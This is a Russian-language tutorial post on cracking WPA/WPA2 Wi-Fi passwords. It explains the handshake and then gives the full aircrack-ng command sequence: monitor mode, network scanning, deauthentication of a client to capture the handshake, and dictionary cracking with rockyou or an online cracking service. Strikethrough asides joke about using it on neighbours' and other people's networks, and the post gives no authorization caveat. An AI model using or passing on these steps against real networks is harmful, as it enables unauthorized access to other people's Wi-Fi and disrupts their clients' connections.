Введение 1.2
Важная информация про админов — они болеют короной, но стойко делают вид, что еще живы. Так или иначе, на ближайшее время посты буду выпускать я.
Поскольку я прекрасно понимаю, что учить что-то просто так и не видеть никаких результатов сложно, мы немного зайдем вперед и посмотрим на тестирование на проникновение Wi-Fi. Тема дико заезженная, информации в сети о ней тонны, но для начала своего пути и просто подогреть интерес совсем новичков вполне подойдет. Да и самому себя защитить никогда не будет лишним, а когда мы дойдем до атак в локальной сети, получение доступа к ̶ч̶у̶ж̶о̶м̶у̶ Wi-Fi станет самым настоящим подарком и веселым времяпровождением на пару вечеров.
Для начала давайте разберемся о самых основных понятиях и терминах.
Бывают такие типы защиты Wi-Fi:
WEP - очень старый, практически не испульзуемый в реальном мире протокол. Уязвимый до жути, множество автоматических утилит для его взлома. Толку заострять на нем внимание не вижу - сомневаюсь что вы вообще его хоть когда-то увидите. А если увидели у себя... Ну в общем вы поняли.
WPS - тоже старая штука. Это возможность настройки роутера удаленно. Как не странно, тоже довольно уязвимая. Ей сделали патч несколько лет назад, но нормальные люди выключают ее всегда. Ее я так-же долго разбирать смысла не вижу - новые роутеры от атак на нее защищены. Если увидели - читайте по поводу атаки PixieDust.
WPA - современный протокол безопасности, использует трехстороннее рукопожатие (дальше подробнее).
WPA2 - то же, что и предыдущее, но шифрование в нем реально годное - AES.
Скорее всего ̶с̶о̶с̶е̶д̶и̶ тестируемые точки будут иметь WPA, так что про него и поговорим.
Трехстороннее рукопожатие, aka хендшейк выглядит примерно так
На человеческий можно перевести как разговор двух человек:
-Привет, можно зайти?
-Да, заходи
-Захожу
Именно этот "разговор" нам и нужно будет перехватить, что-бы расшифровать его.
Но тут встает первая проблема: рукопожатие можно перехватить только при подключении нового пользователя к сети. Например: вышел из дома с телефоном, вернулся, телефон подключился к сети - именно в этот момент и есть возможность перехватить рукопожатие. Не ждать же нам когда это произойдет. Для этого нужно будет провести атаку деаутентификации. Я немного забегаю вперед, но это нужно для понимания самого процесса.
Только понимая программу/сеть/etc лучше ее хозяина, можно получить к ней доступ (с) Джейсон С.
Начнем с самого начала. Нам нужно узнать как именно называется интерфейс, через который мы подключены к сети. После его нужно будет перевести в состояние мониторинга. И вот тут могут быть реальные проблемы - не каждая сетевая карта такое умеет, большенство ноутбуков все-таки должны справиться. В противном случае нужно будет купить внешний адаптер. Совсем мажоры побегут покупать Альфу, но сейчас нам не дальность нужна, так что подойдет любая, даже самая дешевая - главное что-бы умела мониторить. ̶У̶ ̶п̶р̶о̶д̶а̶в̶ц̶а̶ ̶я̶ ̶б̶ы̶ ̶т̶а̶к̶о̶е̶ ̶н̶е̶ ̶с̶п̶р̶а̶ш̶и̶в̶а̶л̶
Вводим команду:
ifconfig
Увидеть должны примерно следущее
Сейчас мы открыли конфигурацию интерфейса
Давайте учиться читать что в нем написано
eth0 - кабелоное подключение, оно же ethernet
l0 - Loopback интерфейс, типо локальной (неправильный термин, это сеть самого компа. Не знаю как правильно его назвать на русском) сети.
wlan0 - беспроводная сеть, она нам и нужна.
В данном примере она имеет номер 0.
(В программировании все начинается с 0, так что сервер1 по факту будет вторым сервером, так как был еще сервер0, который и был первым)
Тормозим все процессы, которые сейчас используют сеть
airmon-ng check kill
Процессы убили, можем переходить дальше.
Поднимаем карту в режиме мониторинга airmon-ng start wlan0
В этом режиме подключиться к вайфаю уже не выйдет, так как карта выполняет другую функцию.
Теперь нужно просканировать все сети
airodump-ng wlan0mon airodump-ng - название утилиты wlan0mon - новый веб интерфейс, проверить его новое название можно открыв конфигурацию интерфейса.
Примерно такой вывод мы должны были получить.
Когда наберется достаточно сетей нажимаем Ctrl+C
(знак + означает одновременное нажатие клавиш)
Находим нужную нам точку доступа.
airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon
- airodump-ng : перехватываем пакеты
- -c : Канал
- –bssid : MAC адрес точки доступа.
- -w : директория, куда сохраняем.
- wlan0mon : имя интерфейса.
Открываем новый терминал, этот оставляем работать. Сейчас нужно будет выбить из сети клиента, что-бы он смог снова подключиться и мы могли перехватить хендшейк.
aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
- aireplay-ng : тулза для иньекции
- -0 : деаутентификация
- 10 : кол-во пакетов, которые нужно будет отправить
- -a : bssid сети
- wlan0mon : имя интерфейса.
Жмем ввод и возвращаемся к прошлому окну терминала. Ждем пока увидим вот это:
Вот мы и перехватили этот хендшейк. Сохранен он как файл с расшерение .сар, так что нужно его найти. Теперь расшифруем его.
aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
- aircrack-ng : программа для кряка ключей
- -a : -a2 для WPA2 и -a для WPA
- -b : BSSID сети
- -w : путь к словарю. Лучший словарь в Кали лежит по пути /usr/share/wordlists/rockyou.txt
- /root/hacking-01.cap : Путь к .сар файлу
Теперь просто ждем когда будут проверены все варианты. Если в словаре будет правильный пароль то увидите примерно этоЖ
Занять это может много времени и жужжать комп будет как вертолет, так что советую использовать онлайн-сервисы для этого. Я использую https://wpa-sec.stanev.org/